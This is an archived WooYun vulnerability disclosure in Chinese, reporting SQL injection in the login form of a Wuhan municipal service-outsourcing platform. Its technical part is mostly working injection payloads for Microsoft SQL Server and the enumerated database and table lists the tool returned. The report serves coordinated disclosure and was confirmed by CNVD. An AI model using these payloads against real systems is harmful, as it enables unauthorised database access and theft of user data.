乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-06: 细节已通知厂商并且等待厂商处理中 2015-09-08: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-18: 细节向核心白帽子及相关领域专家公开 2015-09-28: 细节向普通白帽子公开 2015-10-08: 细节向实习白帽子公开 2015-10-23: 细节向公众公开
RT
武汉服务外包公共服务平台是由武汉市商务局主办,武汉市服务外包协会协办的围绕服务武汉市服务外包行业的综合性服务平台。
http://**.**.**.**/
漏洞地址:
POST /Login.aspx HTTP/1.1Host: **.**.**.**Proxy-Connection: keep-aliveContent-Length: 309Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://**.**.**.**Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=wcncyzv103erty55a2wuxz45__VIEWSTATE=%2FwEPDwUKMTEyNjg2Nzk4NGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCWlibVN1Ym1pdIo3R8s7J0XinKyOXVYq0YA%2F3%2Fr1&cookieexists=false&tbUserName=admin&tbUserPassword=admin&ibmSubmit.x=44&ibmSubmit.y=6&__EVENTVALIDATION=%2FwEWBAK0lrb7CwLyj%2FOQAgKyr5hiAuum6sECjr68jF9IgyR%2FVN6EVMRSn%2BngAbM%3D
tbUserName参数存在注入
---Parameter: tbUserName (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKMTEyNjg2Nzk4NGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCWlibVN1Ym1pdIo3R8s7J0XinKyOXVYq0YA/3/r1&cookieexists=false&tbUserName=admin' AND 6844=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6844=6844) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(120)+CHAR(113))) AND 'TNLI'='TNLI&tbUserPassword=admin&ibmSubmit.x=44&ibmSubmit.y=6&__EVENTVALIDATION=/wEWBAK0lrb7CwLyj/OQAgKyr5hiAuum6sECjr68jF9IgyR/VN6EVMRSn+ngAbM= Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: __VIEWSTATE=/wEPDwUKMTEyNjg2Nzk4NGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCWlibVN1Ym1pdIo3R8s7J0XinKyOXVYq0YA/3/r1&cookieexists=false&tbUserName=admin' UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(117)+CHAR(104)+CHAR(83)+CHAR(68)+CHAR(80)+CHAR(101)+CHAR(104)+CHAR(104)+CHAR(82)+CHAR(67)+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(120)+CHAR(113),NULL,NULL,NULL-- &tbUserPassword=admin&ibmSubmit.x=44&ibmSubmit.y=6&__EVENTVALIDATION=/wEWBAK0lrb7CwLyj/OQAgKyr5hiAuum6sECjr68jF9IgyR/VN6EVMRSn+ngAbM=---[14:03:43] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET, Nginx, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005
数据库:
available databases [7]:[*] master[*] model[*] MQN[*] msdb[*] tempdb[*] wsoa[*] XGJWH
Database: wsoa+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.NT_sys_logs | 1597 || dbo.NT_Sys_Help | 656 || dbo.NT_News_URL | 94 || dbo.NT_Api_Navi | 55 || dbo.NT_News_Class | 30 || dbo.NT_News_Class | 30 || dbo.NT_Api_Qmenu | 20 || dbo.NT_Customform_item | 10 || dbo.NT_Customform_item | 10 || dbo.NT_sys_UserLevel | 10 || dbo.NT_Vote_Manage | 9 || dbo.NT_sys_channellabelclass | 8 || dbo.NT_sys_channellabelclass | 8 || dbo.NT_sys_channelstyleclass | 8 || dbo.NT_sys_channelstyleclass | 8 || dbo.NT_Api_Commentary | 7 || dbo.NT_Form_baoming | 6 || dbo.NT_Form_baoming | 6 || dbo.NT_GuestSubject | 6 || dbo.NT_GuestBook | 5 || dbo.NT_sys_LabelStyle | 5 || dbo.NT_sys_LabelClass | 4 || dbo.NT_sys_LabelClass | 4 || dbo.NT_sys_userfields | 4 || dbo.NT_sys_userfields | 4 || dbo.NT_user_Ghistory | 4 || dbo.NT_DataChartClass | 3 || dbo.NT_DataChartClass | 3 || dbo.NT_news_sub | 3 || dbo.NT_user_Guser | 3 || dbo.NT_user_userlogs | 3 || dbo.NT_Vote_Item | 3 || dbo.NT_VoteInfo | 3 || dbo.NT_sys_styleclass | 2 || dbo.NT_user_Message | 2 || dbo.NT_user_MessFiles | 2 || dbo.NT_Vote_Class | 2 || dbo.NT_VoteClass | 2 || dbo.NT_VoteIP | 2 || dbo.NT_Ads_Class | 1 || dbo.NT_Ads_Class | 1 || dbo.NT_Ads_Stat | 1 || dbo.NT_Collect_SiteFolder | 1 || dbo.NT_Collect_SiteFolder | 1 || dbo.NT_Define_Class | 1 || dbo.NT_Friend_Class | 1 || dbo.NT_Friend_Link | 1 || dbo.NT_Friend_Pram | 1 || dbo.NT_News_Gen | 1 || dbo.NT_news_site | 1 || dbo.NT_news_special | 1 || dbo.NT_old_news | 1 || dbo.NT_special_news | 1 || dbo.NT_stat_param | 1 || dbo.NT_sys_admingroup | 1 || dbo.NT_sys_admingroup | 1 || dbo.NT_sys_LabelFree | 1 || dbo.NT_sys_newsIndex | 1 || dbo.NT_sys_param | 1 || dbo.NT_sys_parmConstr | 1 || dbo.NT_sys_parmPrint | 1 || dbo.NT_sys_Pramother | 1 || dbo.NT_sys_PramUser | 1 || dbo.NT_user_Group | 1 || dbo.NT_Vote_Param | 1 |+--------------------------------------------------+---------+Database: master+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| sys.messages | 67941 || sys.sysmessages | 67941 || sys.syscolumns | 10642 || sys.all_parameters | 6697 || sys.system_parameters | 6697 || sys.trace_subclass_values | 4722 || sys.trace_event_bindings | 3958 || sys.all_columns | 3740 || sys.system_columns | 3696 || sys.syscomments | 2744 || dbo.spt_values | 2346 || sys.all_objects | 1747 || sys.sysobjects | 1747 || sys.system_objects | 1741 || sys.database_permissions | 1641 || sys.syspermissions | 1641 || sys.sysprotects | 1640 || sys.all_sql_modules | 1589 || sys.system_sql_modules | 1589 || sys.all_views | 284 || sys.system_views | 284 || sys.event_notification_event_types | 193 || sys.trace_events | 171 || sys.syscharsets | 114 || sys.allocation_units | 112 || sys.dm_db_partition_stats | 101 || sys.partitions | 101 || sys.system_components_surface_area_configuration | 98 || sys.xml_schema_facets | 97 || sys.xml_schema_components | 93 || sys.xml_schema_types | 77 || sys.trace_columns | 65 || sys.configurations | 62 || sys.sysconfigures | 62 || sys.syscurconfigs | 62 || sys.fulltext_document_types | 50 || INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44 || INFORMATION_SCHEMA.COLUMNS | 44 || sys.columns | 44 || sys.syslanguages | 33 || sys.systypes | 27 || sys.types | 27 || sys.securable_classes | 21 || sys.trace_categories | 21 || sys.fulltext_languages | 17 || sys.xml_schema_component_placements | 17 || sys.database_principals | 15 || sys.sysusers | 15 || INFORMATION_SCHEMA.SCHEMATA | 14 || sys.schemas | 14 || sys.xml_schema_attributes | 14 || sys.server_principals | 11 || sys.service_contract_message_usages | 11 || sys.database_recovery_status | 7 || sys.databases | 7 || sys.server_permissions | 7 || sys.sysdatabases | 7 || sys.sysindexes | 7 || sys.indexes | 6 || sys.objects | 6 || sys.stats_columns | 6 || sys.stats_columns | 6 || INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 || INFORMATION_SCHEMA.TABLES | 5 || sys.index_columns | 5 || sys.sysindexkeys | 5 || sys.tables | 5 || sys.endpoints | 4 || sys.service_queue_usages | 3 || sys.syssegments | 3 || sys.xml_schema_namespaces | 3 || sys.database_files | 2 || sys.login_token | 2 || sys.service_contract_usages | 2 || sys.sql_logins | 2 || sys.sysfiles | 2 || sys.syslogins | 2 || sys.user_token | 2 || dbo.spt_monitor | 1 || sys.data_spaces | 1 || sys.database_role_members | 1 || sys.default_constraints | 1 || sys.dm_exec_requests | 1 || sys.dm_exec_sessions | 1 || sys.filegroups | 1 || sys.server_role_members | 1 || sys.servers | 1 || sys.sysconstraints | 1 || sys.sysfilegroups | 1 || sys.sysmembers | 1 || sys.sysprocesses | 1 || sys.sysservers | 1 || sys.tcp_endpoints | 1 || sys.via_endpoints | 1 || sys.xml_schema_collections | 1 || sys.xml_schema_model_groups | 1 || sys.xml_schema_wildcards | 1 |+--------------------------------------------------+---------+Database: msdb+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.backupfile | 1896 || dbo.backupset | 948 || dbo.backupmediafamily | 930 || dbo.backupmediaset | 930 || dbo.restorefilegroup | 4 || dbo.restorefilegroup | 4 || dbo.restorehistory | 4 |+--------------------------------------------------+---------+Database: MQN+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.QuestionnaireChanged | 872132 || dbo.QuestionnaireChanged | 872132 || dbo.Test | 10363 || dbo.Users | 274 || dbo.Enterprise | 266 |+--------------------------------------------------+---------+
过滤
危害等级:高
漏洞Rank:11
确认时间:2015-09-08 19:41
CNVD确认所述情况,已经转由CNCERT下发给湖北分中心,由其后续协调网站管理单位处置。
暂无